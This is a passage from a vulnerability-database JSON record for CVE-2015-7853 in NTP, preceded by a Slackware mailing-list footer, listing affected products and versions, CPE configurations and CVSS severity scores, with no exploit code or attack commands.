+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-0036", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.0" }, { "model": "clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand performance manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.3.77" }, { "model": "data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand balance", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p4" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.2" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.4" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.2.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "ntpd", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.1" }, { "model": "ntpd", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.0.a", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" }, { "model": "ib6131 gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "83.4" }, { "model": "ib6131 gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "83.2" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.126" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.8" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.11" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p21", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "10.2-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-beta2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-beta2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "10.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc4-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-beta3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "summit wm3000 series", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.4" }, { "model": "extremexos patch", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.38" }, { "model": "extremexos patch", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.31" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.6.4" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1" }, { "model": "extremexos 15.4.1.3-patch1-10", "scope": null, "trust": 0.3, "vendor": "extremenetworks", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.4.1.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.3" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "4.2.8p4", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.14.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.37.00" }, { "model": "ib6131 gb infiniband switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "83.5.1000" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.7.03.00" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.1000" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p29", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-release-p6", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p23", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "purview appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" } ], "sources": [ { "db": "BID", "id": "77273" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "NVD", "id": "CVE-2015-7853" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.77", "versionStartIncluding": "4.3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-7853" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Siemens reported these vulnerabilities to CISA.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201510-577" } ], "trust": 0.6 }, "cve": "CVE-2015-7853", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-7853", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2015-7853", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2015-7853", "trust": 1.8, "value": "CRITICAL" }, { "author": "CNNVD", "id": "CNNVD-202104-975", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201510-577", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2015-7853", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7853" }, { "db": "JVNDB", "id": "JVNDB-2015-007705" }, { "db": "NVD", "id": "CVE-2015-7853" }, { "db": "CNNVD", "id": "CNNVD-202104-975" }, { "db": "CNNVD", "id": "CNNVD-201510-577" } ] }, 